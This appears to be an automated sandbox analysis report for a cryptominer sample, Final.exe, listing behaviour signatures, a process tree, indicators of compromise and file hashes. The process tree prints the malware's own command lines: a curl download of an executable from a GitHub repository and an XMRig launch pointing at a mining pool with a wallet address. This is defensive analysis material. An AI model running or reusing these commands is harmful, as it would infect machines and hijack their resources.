Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
22/04/2024, 21:46
Static task
static1
Behavioral task
behavioral1
Sample
Final.exe
Resource
win10v2004-20240412-en
General
-
Target
Final.exe
-
Size
12.5MB
-
MD5
3d30cc33bc230bd6d694f40c3bb825a8
-
SHA1
31edf37778986b26d33f65eae7e5b6b2a9a19024
-
SHA256
3e0ae7a114a5707d81e9ef20289d41f69281038b8d8eb3c4f786b86507075eb7
-
SHA512
5d2f5994ad20d7b342956efcdab718c1fc291b153a9b22d2ce511c4a2b8a828207ac70690698fa7d83a3273dd7404cafadc7f8c83ae8ab4f863184ed1cdc77fa
-
SSDEEP
393216:WludQdF3MnG3hFTuQmz2QwMCht9/Zy3A4YgyrDFhf:WludQ73MGxtuB2QxCh3xy3wRf
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/0x000b00000002342e-80.dat family_xmrig behavioral1/files/0x000b00000002342e-80.dat xmrig -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation Final.exe -
Executes dropped EXE 4 IoCs
pid Process 4884 soundservice.exe 2204 soundservice.exe 1940 SoundDrive.exe 5096 SoundDrive.exe -
Loads dropped DLL 14 IoCs
pid Process 2644 Final.exe 2644 Final.exe 2644 Final.exe 2644 Final.exe 2644 Final.exe 2204 soundservice.exe 2204 soundservice.exe 2204 soundservice.exe 2204 soundservice.exe 2204 soundservice.exe 2204 soundservice.exe 2204 soundservice.exe 2204 soundservice.exe 2204 soundservice.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 35 raw.githubusercontent.com 36 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2204 soundservice.exe 2204 soundservice.exe 2204 soundservice.exe 2204 soundservice.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2204 soundservice.exe Token: SeLockMemoryPrivilege 1940 SoundDrive.exe Token: SeLockMemoryPrivilege 5096 SoundDrive.exe Token: SeLockMemoryPrivilege 1940 SoundDrive.exe Token: SeLockMemoryPrivilege 5096 SoundDrive.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 5096 SoundDrive.exe 1940 SoundDrive.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3716 wrote to memory of 2644 3716 Final.exe 85 PID 3716 wrote to memory of 2644 3716 Final.exe 85 PID 2644 wrote to memory of 4884 2644 Final.exe 86 PID 2644 wrote to memory of 4884 2644 Final.exe 86 PID 4884 wrote to memory of 2204 4884 soundservice.exe 88 PID 4884 wrote to memory of 2204 4884 soundservice.exe 88 PID 2204 wrote to memory of 2920 2204 soundservice.exe 92 PID 2204 wrote to memory of 2920 2204 soundservice.exe 92 PID 2920 wrote to memory of 2364 2920 cmd.exe 94 PID 2920 wrote to memory of 2364 2920 cmd.exe 94 PID 2204 wrote to memory of 2716 2204 soundservice.exe 105 PID 2204 wrote to memory of 2716 2204 soundservice.exe 105 PID 2204 wrote to memory of 1788 2204 soundservice.exe 106 PID 2204 wrote to memory of 1788 2204 soundservice.exe 106 PID 1788 wrote to memory of 1940 1788 cmd.exe 109 PID 1788 wrote to memory of 1940 1788 cmd.exe 109 PID 2716 wrote to memory of 5096 2716 cmd.exe 110 PID 2716 wrote to memory of 5096 2716 cmd.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\Final.exe"C:\Users\Admin\AppData\Local\Temp\Final.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Users\Admin\AppData\Local\Temp\Final.exe"C:\Users\Admin\AppData\Local\Temp\Final.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Users\Admin\AppData\Local\Temp\_MEI37162\soundservice.exe"C:\Users\Admin\AppData\Local\Temp\_MEI37162\soundservice.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Users\Admin\AppData\Local\Temp\onefile_4884_133582959752271546\soundservice.exe"C:\Users\Admin\AppData\Local\Temp\_MEI37162\soundservice.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -L -k https://github.com/mzusi/m/raw/main/SoundDriver.exe -o SoundDrive.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\system32\curl.execurl -L -k https://github.com/mzusi/m/raw/main/SoundDriver.exe -o SoundDrive.exe6⤵PID:2364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k"5⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe"C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k"5⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe"C:\Users\Admin\AppData\Local\Temp\SoundDrive.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1940
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD53cba71b6bc59c26518dc865241add80a
SHA17e9c609790b1de110328bbbcbb4cd09b7150e5bd
SHA256e10b73d6e13a5ae2624630f3d8535c5091ef403db6a00a2798f30874938ee996
SHA5123ef7e20e382d51d93c707be930e12781636433650d0a2c27e109ebebeba1f30ea3e7b09af985f87f67f6b9d2ac6a7a717435f94b9d1585a9eb093a83771b43f2
-
Filesize
5.1MB
MD599aa369598e5d8eba59b7d0f0a8429f9
SHA17baaf6546112049038e4c62143ce7dd77c3a97c9
SHA2568174ccc5cfae43503648608ba6ae14b00679517591a2cdff9017c4be2ab2996b
SHA5123fdb8674033d6736bb548c262f54e1277c196fb83c3bfcc6dbe9b8bb126fb3f8404b6385f666b389e5ea84ab7261bcb65dddd88e39c53d3d0e6813dd9212c62f
-
Filesize
96KB
MD5f12681a472b9dd04a812e16096514974
SHA16fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA5127d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2
-
Filesize
37KB
MD575e78e4bf561031d39f86143753400ff
SHA1324c2a99e39f8992459495182677e91656a05206
SHA2561758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e
SHA512ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756
-
Filesize
81KB
MD54101128e19134a4733028cfaafc2f3bb
SHA166c18b0406201c3cfbba6e239ab9ee3dbb3be07d
SHA2565843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80
SHA5124f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca
-
Filesize
245KB
MD5d47e6acf09ead5774d5b471ab3ab96ff
SHA164ce9b5d5f07395935df95d4a0f06760319224a2
SHA256d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e
SHA51252e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2
-
Filesize
62KB
MD5de4d104ea13b70c093b07219d2eff6cb
SHA183daf591c049f977879e5114c5fea9bbbfa0ad7b
SHA25639bc615842a176db72d4e0558f3cdcae23ab0623ad132f815d21dcfbfd4b110e
SHA512567f703c2e45f13c6107d767597dba762dc5caa86024c87e7b28df2d6c77cd06d3f1f97eed45e6ef127d5346679fea89ac4dc2c453ce366b6233c0fa68d82692
-
Filesize
154KB
MD5337b0e65a856568778e25660f77bc80a
SHA14d9e921feaee5fa70181eba99054ffa7b6c9bb3f
SHA256613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a
SHA51219e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e
-
Filesize
76KB
MD58140bdc5803a4893509f0e39b67158ce
SHA1653cc1c82ba6240b0186623724aec3287e9bc232
SHA25639715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769
SHA512d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826
-
Filesize
1.4MB
MD583d235e1f5b0ee5b0282b5ab7244f6c4
SHA1629a1ce71314d7abbce96674a1ddf9f38c4a5e9c
SHA256db389a9e14bfac6ee5cce17d41f9637d3ff8b702cc74102db8643e78659670a0
SHA51277364aff24cfc75ee32e50973b7d589b4a896d634305d965ecbc31a9e0097e270499dbec93126092eb11f3f1ad97692db6ca5927d3d02f3d053336d6267d7e5f
-
Filesize
3.3MB
MD56f4b8eb45a965372156086201207c81f
SHA18278f9539463f0a45009287f0516098cb7a15406
SHA256976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541
SHA5122c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f
-
Filesize
5.5MB
MD59a24c8c35e4ac4b1597124c1dcbebe0f
SHA1f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA5129d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b
-
Filesize
131KB
MD590b786dc6795d8ad0870e290349b5b52
SHA1592c54e67cf5d2d884339e7a8d7a21e003e6482f
SHA25689f2a5c6be1e70b3d895318fdd618506b8c0e9a63b6a1a4055dff4abdc89f18a
SHA512c6e1dbf25d260c723a26c88ec027d40d47f5e28fc9eb2dbc72a88813a1d05c7f75616b31836b68b87df45c65eef6f3eaed2a9f9767f9e2f12c45f672c2116e72
-
Filesize
28KB
MD597ee623f1217a7b4b7de5769b7b665d6
SHA195b918f3f4c057fb9c878c8cc5e502c0bd9e54c0
SHA2560046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790
SHA51220edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f
-
Filesize
6.3MB
MD54f9ca5ab2e887ee687dff2ce85052bf6
SHA18d0a291413f890729af5ed58b9c597ee500f2da3
SHA2569409baeb09064df416ec9c342623145667432ec358622e0dfe887eb4360e660a
SHA512791dc4ff8b19494664ec93725984d97b140895cfda8c7567c6a86e1b9b9e7908ab175a4be0e1dc22389ceb58d2e02612b1e833e63ab4ab73ae0f2dcd494c7d57
-
Filesize
1.1MB
MD5bc58eb17a9c2e48e97a12174818d969d
SHA111949ebc05d24ab39d86193b6b6fcff3e4733cfd
SHA256ecf7836aa0d36b5880eb6f799ec402b1f2e999f78bfff6fb9a942d1d8d0b9baa
SHA5124aa2b2ce3eb47503b48f6a888162a527834a6c04d3b49c562983b4d5aad9b7363d57aef2e17fe6412b89a9a3b37fb62a4ade4afc90016e2759638a17b1deae6c
-
Filesize
130KB
MD51d6762b494dc9e60ca95f7238ae1fb14
SHA1aa0397d96a0ed41b2f03352049dafe040d59ad5d
SHA256fae5323e2119a8f678055f4244177b5806c7b6b171b1945168f685631b913664
SHA5120b561f651161a34c37ff8d115f154c52202f573d049681f8cdd7bba2e966bb8203780c19ba824b4a693ef12ef1eeef6aeeef96eb369e4b6129f1deb6b26aaa00
-
Filesize
64KB
MD534e49bb1dfddf6037f0001d9aefe7d61
SHA1a25a39dca11cdc195c9ecd49e95657a3e4fe3215
SHA2564055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281
SHA512edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856
-
Filesize
9.6MB
MD52754ffc05ccb17313935e7c5282f16ce
SHA1e343a4a8a4895132c1ed77344fd96d5d05c948da
SHA2563d8b729740addfd7f622b1ccc28b3539ed54824bbd9b71bf9b9695c7eb19d7ca
SHA51299b75d34413d2ff78e8a369bed6182c586a3515075f5461b3c4d5c1e79f7860bd49fa00142fd83cba5ccf03c21db987361fb137be65187e46f4699cc6071201a